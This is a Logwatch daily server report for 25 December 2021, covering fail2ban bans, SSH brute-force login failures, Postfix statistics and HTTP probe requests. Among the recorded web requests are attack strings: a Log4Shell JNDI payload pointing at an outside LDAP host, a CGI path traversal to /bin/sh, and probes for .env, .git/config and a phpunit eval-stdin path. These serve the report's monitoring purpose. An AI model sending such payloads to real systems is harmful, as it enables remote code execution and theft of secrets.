04:42
################### Logwatch 7.4.0 (03/01/11) ####################
Processing Initiated: Sun Dec 26 04:42:05 2021
Date Range Processed: yesterday
( 2021-Dec-25 )
Period is day.
Detail Level of Output: 0
Type of Output/Format: mail / text
Logfiles for Host: h2361197.stratoserver.net
##################################################################
--------------------- fail2ban-messages Begin ------------------------
Banned services with Fail2Ban: Bans:Unbans
ssh: [ 16:10 ]
---------------------- fail2ban-messages End -------------------------
--------------------- httpd Begin ------------------------
Connection attempts using mod_proxy:
60.191.125.35 -> zapf.wiki:443: 1 Time(s)
A total of 7 sites probed the server
143.110.159.129
167.71.204.120
205.185.124.100
34.86.35.5
47.242.86.135
5.188.210.227
61.219.11.151
Requests with error response codes
400 Bad Request
null: 15 Time(s)
/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh: 3 Time(s)
mstshash=Administr: 3 Time(s)
/w00tw00t.at.ISC.SANS.DFind:): 2 Time(s)
mstshash=Domain: 2 Time(s)
/.git/config: 1 Time(s)
/ab2g: 1 Time(s)
/ab2h: 1 Time(s)
/bag2: 1 Time(s)
/sdk: 1 Time(s)
7: 1 Time(s)
\xB9\xDB\x0CEN#5h[\xE4\xC5\x16\xF7wBr=\xB1: 1 Time(s)
http://5.188.210.227/echo.php: 1 Time(s)
zapf.wiki:443: 1 Time(s)
404 Not Found
//2019/wp-includes/wlwmanifest.xml: 1 Time(s)
//2020/wp-includes/wlwmanifest.xml: 1 Time(s)
//blog/wp-includes/wlwmanifest.xml: 1 Time(s)
//cms/wp-includes/wlwmanifest.xml: 1 Time(s)
//news/wp-includes/wlwmanifest.xml: 1 Time(s)
//shop/wp-includes/wlwmanifest.xml: 1 Time(s)
//site/wp-includes/wlwmanifest.xml: 1 Time(s)
//sito/wp-includes/wlwmanifest.xml: 1 Time(s)
//test/wp-includes/wlwmanifest.xml: 1 Time(s)
//web/wp-includes/wlwmanifest.xml: 1 Time(s)
//website/wp-includes/wlwmanifest.xml: 1 Time(s)
//wordpress/wp-includes/wlwmanifest.xml: 1 Time(s)
//wp-includes/wlwmanifest.xml: 1 Time(s)
//wp/wp-includes/wlwmanifest.xml: 1 Time(s)
//wp1/wp-includes/wlwmanifest.xml: 1 Time(s)
//wp2/wp-includes/wlwmanifest.xml: 1 Time(s)
//xmlrpc.php?rsd: 1 Time(s)
500 Internal Server Error
/: 22 Time(s)
/.env: 2 Time(s)
/ecp/Current/exporttool/microsoft.exchange ... ool.application: 2 Time(s)
/favicon.ico: 2 Time(s)
/.git/config: 1 Time(s)
//login_sid.lua: 1 Time(s)
/?XDEBUG_SESSION_START=phpstorm: 1 Time(s)
/?x=${jndi:ldap://195.54.160.149:12344/Bas ... I6NDQzKXxiYXNo}: 1 Time(s)
/Autodiscover/Autodiscover.xml: 1 Time(s)
/HNAP1: 1 Time(s)
/_ignition/execute-solution: 1 Time(s)
/actuator/health: 1 Time(s)
/console/: 1 Time(s)
/ecp/En.js: 1 Time(s)
/evox/about: 1 Time(s)
/mifs/.;/services/LogService: 1 Time(s)
/owa/auth/logon.aspx: 1 Time(s)
/owa/auth/logon.aspx?replaceCurrent=1&url= ... apf.in%2Fowa%2F: 1 Time(s)
/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f: 1 Time(s)
/owa/auth/x.js: 1 Time(s)
/sdk: 1 Time(s)
/text4041640409592: 1 Time(s)
/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php: 1 Time(s)
---------------------- httpd End -------------------------
--------------------- pam_unix Begin ------------------------
sshd:
Authentication Failures:
root (111.161.74.117): 36 Time(s)
root (106.52.51.73): 35 Time(s)
root (113.90.238.152): 21 Time(s)
root (lnsm5-toronto12-64-231-120-240.internet.virginmobile.ca): 17 Time(s)
root (113.110.164.74): 16 Time(s)
unknown (106.52.51.73): 15 Time(s)
unknown (111.161.74.117): 14 Time(s)
root (45.114.192.154): 8 Time(s)
unknown (lnsm5-toronto12-64-231-120-240.internet.virginmobile.ca): 7 Time(s)
root (185.100.86.74): 6 Time(s)
root (46.182.21.248): 6 Time(s)
root (exitrelay16.medvideos-tor.org): 6 Time(s)
root (phoolandevi.tor-exit.calyxinstitute.org): 6 Time(s)
root (static-198-54-128-94.cust.tzulo.com): 6 Time(s)
root (tor-exit-vie.linkspartei.org): 6 Time(s)
unknown (113.90.238.152): 6 Time(s)
unknown (113.110.164.74): 5 Time(s)
unknown (114.247.79.179): 5 Time(s)
root (114.247.79.179): 2 Time(s)
unknown (12.246.170.142): 2 Time(s)
unknown (175.10.34.200): 2 Time(s)
unknown (45.114.192.154): 2 Time(s)
unknown (64.124.154.123): 2 Time(s)
unknown (81.88.254.33): 2 Time(s)
unknown (82.142.23.8): 2 Time(s)
unknown (ip70-181-124-215.oc.oc.cox.net): 2 Time(s)
unknown (modemcable106.31-160-184.mc.videotron.ca): 2 Time(s)
unknown (n218103189247.netvigator.com): 2 Time(s)
unknown (p5dd3aa40.dip0.t-ipconnect.de): 2 Time(s)
root (5.183.209.217): 1 Time(s)
root (58.130.120.224): 1 Time(s)
root (vmi668762.contaboserver.net): 1 Time(s)
unknown (185.100.87.202): 1 Time(s)
Invalid Users:
Unknown Account: 73 Time(s)
---------------------- pam_unix End -------------------------
--------------------- Postfix Begin ------------------------
12.048K Bytes accepted 12,337
12.048K Bytes sent via SMTP 12,337
======== ==================================================
1 Accepted 100.00%
-------- --------------------------------------------------
1 Total 100.00%
======== ==================================================
3 4xx Reject relay denied 100.00%
-------- --------------------------------------------------
3 Total 4xx Rejects 100.00%
======== ==================================================
200 Connections
6 Connections lost (inbound)
200 Disconnections
1 Removed from queue
1 Sent via SMTP
---------------------- Postfix End -------------------------
--------------------- sendmail-largeboxes (large mail spool files) Begin
------------------------
Large Mailbox threshold: 40MB (41943040 bytes)
Warning: Large mailbox: mailman.gz (1747199807)
Warning: Large mailbox: mailman (235703599967)
---------------------- sendmail-largeboxes (large mail spool files) End
-------------------------
--------------------- SSHD Begin ------------------------
Disconnecting after too many authentication failures for user:
root : 6 Time(s)
Failed logins from:
5.183.209.217: 4 times
45.114.192.154 (154-192-114-45.intechonline.net): 8 times
46.182.21.248 (tor-exit-relay.anonymizing-proxy.digitalcourage.de): 6 times
58.130.120.224: 1 time
64.231.120.240 (lnsm5-toronto12-64-231-120-240.internet.virginmobile.ca): 17 times
89.58.19.2 (tor-exit-vie.linkspartei.org): 6 times
106.52.51.73: 35 times
107.189.14.76 (exitrelay16.medvideos-tor.org): 6 times
111.161.74.117 (dns117.online.tj.cn): 36 times
113.90.238.152: 21 times
113.110.164.74: 16 times
114.247.79.179: 2 times
161.97.89.132 (vmi668762.contaboserver.net): 1 time
162.247.74.216 (phoolandevi.tor-exit.calyxinstitute.org): 6 times
185.100.86.74: 6 times
198.54.128.94 (static-198-54-128-94.cust.tzulo.com): 6 times
Illegal users from:
2001:470:1:c84::29: 1 time
undef: 51 times
2.57.121.35 (smtp35.kcmoa.com): 1 time
12.246.170.142: 2 times
45.114.192.154 (154-192-114-45.intechonline.net): 2 times
64.62.197.122: 1 time
64.124.154.123 (64.124.154.123.IDIA-173193-ZYO.zip.zayo.com): 2 times
64.231.120.240 (lnsm5-toronto12-64-231-120-240.internet.virginmobile.ca): 7 times
70.181.124.215 (ip70-181-124-215.oc.oc.cox.net): 2 times
81.88.254.33: 2 times
82.142.23.8: 2 times
93.211.170.64 (p5dd3aa40.dip0.t-ipconnect.de): 2 times
106.52.51.73: 15 times
111.161.74.117 (dns117.online.tj.cn): 14 times
113.90.238.152: 6 times
113.110.164.74: 5 times
114.247.79.179: 5 times
154.89.5.83: 1 time
175.10.34.200: 2 times
184.160.31.106 (modemcable106.31-160-184.mc.videotron.ca): 2 times
185.100.87.202: 1 time
218.103.189.247 (n218103189247.netvigator.com): 2 times
---------------------- SSHD End -------------------------
--------------------- Disk Space Begin ------------------------
Filesystem Size Used Avail Use% Mounted on
/dev/ploop33257p1 394G 242G 132G 65% /
none 4.0G 0 4.0G 0% /dev
---------------------- Disk Space End -------------------------
###################### Logwatch End #########################